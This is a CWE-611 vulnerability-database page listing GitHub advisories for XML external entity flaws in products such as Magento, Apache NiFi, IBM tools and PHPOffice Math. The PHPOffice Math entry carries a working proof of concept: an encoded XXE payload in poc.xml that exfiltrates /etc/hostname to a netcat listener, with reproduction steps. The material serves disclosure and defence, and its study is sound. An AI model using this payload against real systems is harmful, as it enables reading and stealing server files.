Common Weakness Enumeration

CWE-611

Allowed

Improper Restriction of XML External Entity Reference

Abstraction: Base · Status: Draft

The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

1694 vulnerabilities reference this CWE, most recent first.

GHSA-3X6C-XFWC-QP7M

Vulnerability from github – Published: 2024-03-29 18:30 – Updated: 2025-03-27 18:30
VLAI
Details

An XML external entity (XXE) vulnerability was found in Stilog Visual Planning 8. It allows an authenticated attacker to access local server files and exfiltrate data to an external server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-49234"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-29T17:15:11Z",
    "severity": "MODERATE"
  },
  "details": "An XML external entity (XXE) vulnerability was found in Stilog Visual Planning 8. It allows an authenticated attacker to access local server files and exfiltrate data to an external server.",
  "id": "GHSA-3x6c-xfwc-qp7m",
  "modified": "2025-03-27T18:30:38Z",
  "published": "2024-03-29T18:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49234"
    },
    {
      "type": "WEB",
      "url": "https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt"
    },
    {
      "type": "WEB",
      "url": "https://www.schutzwerk.com/blog/schutzwerk-sa-2023-006"
    },
    {
      "type": "WEB",
      "url": "https://www.visual-planning.com/en/support-portal/updates"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2024/Apr/3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3XG5-6C3J-VP8X

Vulnerability from github – Published: 2021-08-30 16:23 – Updated: 2024-10-16 21:28
VLAI
Summary
Improper Restriction of XML External Entity Reference in Quokka
Details

XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component 'quokka/utils/atom.py'.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "quokka"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-18703"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-26T17:42:07Z",
    "nvd_published_at": "2021-08-16T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component \u0027quokka/utils/atom.py\u0027.",
  "id": "GHSA-3xg5-6c3j-vp8x",
  "modified": "2024-10-16T21:28:22Z",
  "published": "2021-08-30T16:23:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-18703"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rochacbruno/quokka/issues/676"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/quokka/PYSEC-2021-144.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/quokkaproject/quokka"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Restriction of XML External Entity Reference in Quokka"
}

GHSA-427G-2R83-3CCM

Vulnerability from github – Published: 2019-11-12 22:59 – Updated: 2024-02-12 11:49
VLAI
Summary
Information disclosure through processing of external XML entities
Details

An XML entity injection vulnerability exists in Magento 2.2 prior to 2.2.10, Magento 2.3 prior to 2.3.3 or 2.3.2-p1. An authenticated admin user can craft document type definition for an XML representing XML layout. The crafted document type definition and XML layout allow processing of external entities which can lead to information disclosure.

As per the Magento Release 2.3.3, if you have already implemented the pre-release version of this patch (2.3.2-p1), it is highly recommended to promptly upgrade to 2.3.2-p2.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "magento/community-edition"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2"
            },
            {
              "fixed": "2.2.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "magento/community-edition"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3"
            },
            {
              "fixed": "2.3.2-p2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-8126"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611",
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2019-11-12T22:13:59Z",
    "nvd_published_at": "2019-11-05T23:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An XML entity injection vulnerability exists in Magento 2.2 prior to 2.2.10, Magento 2.3 prior to 2.3.3 or 2.3.2-p1. An authenticated admin user can craft document type definition for an XML representing XML layout. The crafted document type definition and XML layout allow processing of external entities which can lead to information disclosure.\n\nAs per [the Magento Release 2.3.3](https://web.archive.org/web/20201126132230/https://devdocs.magento.com/guides/v2.3/release-notes/release-notes-2-3-3-commerce.html#new-security-only-patch-available), if you have already implemented the pre-release version of this patch (2.3.2-p1), it is highly recommended to promptly upgrade to 2.3.2-p2.",
  "id": "GHSA-427g-2r83-3ccm",
  "modified": "2024-02-12T11:49:40Z",
  "published": "2019-11-12T22:59:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8126"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8126.yaml"
    },
    {
      "type": "WEB",
      "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Information disclosure through processing of external XML entities"
}

GHSA-427Q-VV76-73CH

Vulnerability from github – Published: 2022-05-13 01:32 – Updated: 2022-05-13 01:32
VLAI
Details

IBM DataPower Gateway 7.1.0.0 - 7.1.0.23, 7.2.0.0 - 7.2.0.21, 7.5.0.0 - 7.5.0.16, 7.5.1.0 - 7.5.1.15, 7.5.2.0 - 7.5.2.15, and 7.6.0.0 - 7.6.0.8 as well as IBM DataPower Gateway CD 7.7.0.0 - 7.7.1.2 are vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 144950.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-1669"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-09-25T15:29:00Z",
    "severity": "HIGH"
  },
  "details": "IBM DataPower Gateway 7.1.0.0 - 7.1.0.23, 7.2.0.0 - 7.2.0.21, 7.5.0.0 - 7.5.0.16, 7.5.1.0 - 7.5.1.15, 7.5.2.0 - 7.5.2.15, and 7.6.0.0 - 7.6.0.8 as well as IBM DataPower Gateway CD 7.7.0.0 - 7.7.1.2 are vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 144950.",
  "id": "GHSA-427q-vv76-73ch",
  "modified": "2022-05-13T01:32:58Z",
  "published": "2022-05-13T01:32:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1669"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/144950"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/docview.wss?uid=ibm10730489"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-42GH-7XP2-Q72C

Vulnerability from github – Published: 2022-05-14 01:39 – Updated: 2022-05-14 01:39
VLAI
Details

The SaveUserSettings service in Content Manager in SDL Web 8.5.0 has an XXE Vulnerability that allows reading sensitive files from the system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-19371"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-01-02T18:29:00Z",
    "severity": "MODERATE"
  },
  "details": "The SaveUserSettings service in Content Manager in SDL Web 8.5.0 has an XXE Vulnerability that allows reading sensitive files from the system.",
  "id": "GHSA-42gh-7xp2-q72c",
  "modified": "2022-05-14T01:39:10Z",
  "published": "2022-05-14T01:39:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19371"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/46000"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/150826/SDL-Web-Content-Manager-8.5.0-XML-Injection.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-42HM-PQ2F-3R7M

Vulnerability from github – Published: 2025-05-29 17:27 – Updated: 2025-05-30 21:42
VLAI
Summary
PHPOffice Math allows XXE when processing an XML file in the MathML format
Details

Product: Math Version: 0.2.0 CWE-ID: CWE-611: Improper Restriction of XML External Entity Reference CVSS vector v.4.0: 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N) CVSS vector v.3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) Description: An attacker can create a special XML file, during which it processed, external entities are loaded, and it’s possible to read local server files.
Impact: Local server files reading Vulnerable component: The loadXML function with the unsafe LIBXML_DTDLOAD flag, the MathML class Exploitation conditions: The vulnerability applies only to reading a file in the MathML format. Mitigation: If there is no option to refuse using the LIBXML_DTDLOAD flag, it’s recommended to filter external entities through the implementation of the custom external entity loader function. Researcher: Aleksandr Zhurnakov (Positive Technologies)

Research

Zero-day vulnerability was discovered in the Math library in the detailed process of the XXE vulnerability research in PHP. Loading XML data, using the standard libxml extension and the LIBXML_DTDLOAD flag without additional filtration, leads to XXE.

Below are steps to reproduce the vulnerability.

  1. Preparation:

  2. The payload was tested on the PHP versions >= 8.1.

  3. The composer manager is used to install the latest version of the Math library.
  4. PHP has to be configurated with Zlib support.
  5. The necessary requirements for the Math library must be installed.
  6. The netcat utility is used for demonstration exfiltration.

  7. Make math directory and then moving into it.

mkdir math && cd math
  1. Install the latest actual version of the library (Figure 1).
composer require phpoffice/math
````
_Figure 1. Installing the library_
<img width="630" alt="fig2" src="https://github.com/user-attachments/assets/bb0c6781-4f5a-411c-970d-9402e652ad87" />

4. Create `poc.xml` file (Listing 1): 

_Listing 1. Creating `poc.xml`_

xml

 <foo></foo>

`` 5. Createmath.php` file (Listing 2):

Listing 2. Creating math.php

<?php
    require_once "./vendor/autoload.php";

    $reader = new \PhpOffice\Math\Reader\MathML();
    $reader->read(
        file_get_contents('poc.xml')
    );
  1. The payload (see the step 4) is set to exfiltrate the /etc/hostname file through http://127.0.0.1:9999/, so the listening socket is launched at the 9999 port (Figure 2)

Figure 2. Launching the listening socket fig2

  1. Execute php-script via console:
php math.php 

6 characters from the /etc/hostname file will be exfiltrated to the 9999 port in base64 format (Figure 3).

Figure 3. Characters exfiltration fig3

Decode the received data from base64 removing the last M character (the payload feature) (Figure 4).

Figure 4. Data decoding fig4

  1. By changing the payload, the remaining file can be received.

Credits

Aleksandr Zhurnakov (Positive Technologies)

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/math"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48882"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-29T17:27:39Z",
    "nvd_published_at": "2025-05-30T20:15:43Z",
    "severity": "HIGH"
  },
  "details": "**Product:** Math\n**Version:** 0.2.0\n**CWE-ID:** CWE-611: Improper Restriction of XML External Entity Reference\n**CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n**CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n**Description:** An attacker can create a special XML file, during which it processed, external entities are loaded, and it\u2019s possible to read local server files.  \n**Impact:** Local server files reading\n**Vulnerable component:** The [`loadXML`](https://github.com/PHPOffice/Math/blob/c3ecbf35601e2a322bf2ddba48589d79ac827b92/src/Math/Reader/MathML.php#L38C9-L38C55) function with the unsafe [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, the [`MathML`](https://github.com/PHPOffice/Math/blob/master/src/Math/Reader/MathML.php) class\n**Exploitation conditions:** The vulnerability applies only to reading a file in the `MathML` format.\n**Mitigation:** If there is no option to refuse using the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, it\u2019s recommended to filter external entities through the implementation of the [`custom external entity loader function`](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php).\n**Researcher: Aleksandr Zhurnakov (Positive Technologies)**\n\n## Research\nZero-day vulnerability was discovered in the [Math](https://github.com/PHPOffice/Math) library in the detailed process of the XXE vulnerability research in PHP.\nLoading XML data, using the standard [`libxml`](https://www.php.net/manual/en/book.libxml.php) extension and the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag without additional filtration, leads to XXE.\n\nBelow are steps to reproduce the vulnerability.\n\n1. Preparation:\n\n- The payload was tested on the PHP versions \u003e= 8.1.\n- The [composer](https://getcomposer.org/) manager is used to install the latest version of the Math library.\n- PHP has to be configurated with [Zlib](https://www.php.net/manual/ru/book.zlib.php) support.\n- The necessary [requirements](https://github.com/PHPOffice/Math?tab=readme-ov-file#requirements) for the Math library must be installed.\n- The `netcat` utility is used for demonstration exfiltration.\n\n2. Make `math` directory and then moving into it.\n````\nmkdir math \u0026\u0026 cd math\n````\n\n3. Install the latest actual version of the library (Figure 1). \n```\ncomposer require phpoffice/math\n````\n_Figure 1. Installing the library_\n\u003cimg width=\"630\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/bb0c6781-4f5a-411c-970d-9402e652ad87\" /\u003e\n\n4. Create `poc.xml` file (Listing 1): \n\n_Listing 1. Creating `poc.xml`_\n```\nxml     \n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e     \u003c!DOCTYPE x SYSTEM \n\"php://filter/convert.base64-\ndecode/zlib.inflate/resource=data:,7Ztdb9owFIbv%2bRVZJ9armNjOZ2k7QUaL%2bRYO2nqFUn\nBFNQaMptP272cnNFuTsBbSskg1iATZzvGxn/ccX3A4fdfoecS7UsrK1A98hV5Rr9FVjlaz1UmlcnM7D9i\n6MlkufrB1AK79O2bqKltMllMWt96KL6ADwci7sJ4Yu0vr9/tlwKbqan27CPzrOXvevFGrbRvOGIseaCa7\nTAxok1x44xahXzQEcdKPKZPevap3RZw920I0VscWGLlU1efPsy0c5cbV1AoI7ZuOMCZW12nkcP9Q2%2bQ\nObBNmL6ajg8s6xJqmJTrq5NIArX6zVk8Zcwwt4fPuLvHnbeBSvpdIQ6g93MvUv3CHqKNrmtEW4EYmCr5g\nDT5QzyNWE4x6xO1/aqQmgMhGYgaVDFUnScKltbFnaJoKHRuHK0L1pIkuaYselMe9cPUqRmm5C51u00kkh\ny1S3aBougkl7e4d6RGaTYeSehdCjAG/O/p%2bYfKyQsoLmgdlmsFYQFDjh6GWJyGE0ZfMX08EZtwNTdAY\nud7nLcksnwppA2UnqpCzgyDo1QadAU3vLOQZ82EHMxAi0KVcq7rzas5xD6AQoeqkYkgk02abukkJ/z%2b\nNvkj%2bjUy16Ba5d/S8anhBLwt44EgGkoFkIBlIBpKBZCAZSAaSgWQgGUgGkoFkIBlIBpKBZCAZSAaSgW\nQgGUgGxWOwW2nF7kt%2by7/Kb3ag2GUTUgBvXAAxiKxt4Is3sB4WniVrOvhwzB0CXerg5GN9esGRQv7Rg\nQdMmMO9sIwtc/sIJUOCsY4ee7f7FIWu2Si4euKan8wg58nFsEIXxYGntgZqMog3Z2FrgPhgyzIOlsmijo\nwqwb0jyMqMoGEbarqdOpP/iqFISMkSVFG1Z5p8f3OK%2bxAZ7gClpgUPg70rq0T2RIkcup/0newQ7NbcU\nXv/DPl4LL/N7hdfn2dp07pmd8v79YSdVVgwqcyWd8HC/8aOzkunf6r%2b2c8bpSxK/6uPmlf%2br/nSny\nrHcduH99iqKiz7HwLxTLMgEM0QWUDjb3ji8NdHPslZmV%2bqR%2bfH56Xyxni1VGbV0m8=\" \n[]\u003e\u003cfoo\u003e\u003c/foo\u003e\n```\n5. Create `math.php` file (Listing 2): \n\n*Listing 2. Creating `math.php`*\n````\n\u003c?php\n    require_once \"./vendor/autoload.php\";\n\n    $reader = new \\PhpOffice\\Math\\Reader\\MathML();\n    $reader-\u003eread(\n        file_get_contents(\u0027poc.xml\u0027)\n    );\n````\n6. The payload (see the step 4) is set to exfiltrate the `/etc/hostname` file through `http://127.0.0.1:9999/`, so the listening socket is launched at the `9999` port (Figure 2)\n\n_Figure 2. Launching the listening socket_\n\u003cimg width=\"550\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/6da5b966-70be-4e3e-9bde-c6baf4dfef34\" /\u003e\n\n7. Execute php-script via console: \n````\nphp math.php \n````\n\n6 characters from the `/etc/hostname` file will be exfiltrated to the `9999` port in base64 format (Figure 3). \n\n_Figure 3. Characters exfiltration_\n\u003cimg width=\"520\" alt=\"fig3\" src=\"https://github.com/user-attachments/assets/f0eae873-d156-442f-ab08-12dd94a8dbe9\" /\u003e\n\nDecode the received data from base64 removing the last `M` character (the payload feature) (Figure 4).\n\n*Figure 4. Data decoding*\n\u003cimg width=\"595\" alt=\"fig4\" src=\"https://github.com/user-attachments/assets/7a091a07-7856-41a0-b1bd-3d8009303ced\" /\u003e\n\n8. By changing the payload, the remaining file can be received. \n\n## Credits\nAleksandr Zhurnakov (Positive Technologies)",
  "id": "GHSA-42hm-pq2f-3r7m",
  "modified": "2025-05-30T21:42:11Z",
  "published": "2025-05-29T17:27:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48882"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/Math"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PHPOffice Math allows XXE when processing an XML file in the MathML format "
}

GHSA-42WX-65G4-5CXV

Vulnerability from github – Published: 2022-05-14 03:16 – Updated: 2023-09-12 19:08
VLAI
Summary
Improper Restriction of XML External Entity Reference in Apache NiFi
Details

Apache NiFi External XML Entity issue in SplitXML processor. Malicious XML content could cause information disclosure or remote code execution. The fix to disable external general entity parsing and disallow doctype declarations was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.5.0"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.nifi:nifi-standard-processors"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.1.0"
            },
            {
              "fixed": "1.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-1309"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-29T19:23:50Z",
    "nvd_published_at": "2018-05-23T14:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "Apache NiFi External XML Entity issue in SplitXML processor. Malicious XML content could cause information disclosure or remote code execution. The fix to disable external general entity parsing and disallow doctype declarations was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.",
  "id": "GHSA-42wx-65g4-5cxv",
  "modified": "2023-09-12T19:08:14Z",
  "published": "2022-05-14T03:16:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1309"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/nifi/commit/28067a29fd13cdf8e21b440fc65c6dd67872522f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/nifi"
    },
    {
      "type": "WEB",
      "url": "https://issues.apache.org/jira/browse/NIFI-4869"
    },
    {
      "type": "WEB",
      "url": "https://nifi.apache.org/security.html#CVE-2018-1309"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Restriction of XML External Entity Reference in Apache NiFi"
}

GHSA-43M3-2GF4-GX9R

Vulnerability from github – Published: 2022-05-13 01:33 – Updated: 2022-05-13 01:33
VLAI
Details

IBM Marketing Platform 9.1.0, 9.1.2, and 10.1 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 139029.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-1424"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-12-07T16:29:00Z",
    "severity": "HIGH"
  },
  "details": "IBM Marketing Platform 9.1.0, 9.1.2, and 10.1 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 139029.",
  "id": "GHSA-43m3-2gf4-gx9r",
  "modified": "2022-05-13T01:33:18Z",
  "published": "2022-05-13T01:33:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1424"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/139029"
    },
    {
      "type": "WEB",
      "url": "http://www.ibm.com/support/docview.wss?uid=ibm10744217"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/106201"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-43PW-JFFV-MCR7

Vulnerability from github – Published: 2022-01-22 00:00 – Updated: 2022-01-28 00:03
VLAI
Details

IBM Cognos Controller 10.4.0, 10.4.1, and 10.4.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 190838.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-4875"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-21T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "IBM Cognos Controller 10.4.0, 10.4.1, and 10.4.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 190838.",
  "id": "GHSA-43pw-jffv-mcr7",
  "modified": "2022-01-28T00:03:27Z",
  "published": "2022-01-22T00:00:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-4875"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190838"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/6509856"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-43X2-2PCR-G799

Vulnerability from github – Published: 2022-05-14 01:58 – Updated: 2022-05-14 01:58
VLAI
Details

A remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input, aka "MS XML Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-8420"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-09-13T00:29:00Z",
    "severity": "HIGH"
  },
  "details": "A remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input, aka \"MS XML Remote Code Execution Vulnerability.\" This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.",
  "id": "GHSA-43x2-2pcr-g799",
  "modified": "2022-05-14T01:58:19Z",
  "published": "2022-05-14T01:58:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8420"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8420"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105259"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1041627"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation System Configuration

Many XML parsers and validators can be configured to disable external entity expansion.

CAPEC-221: Data Serialization External Entities Blowup

This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.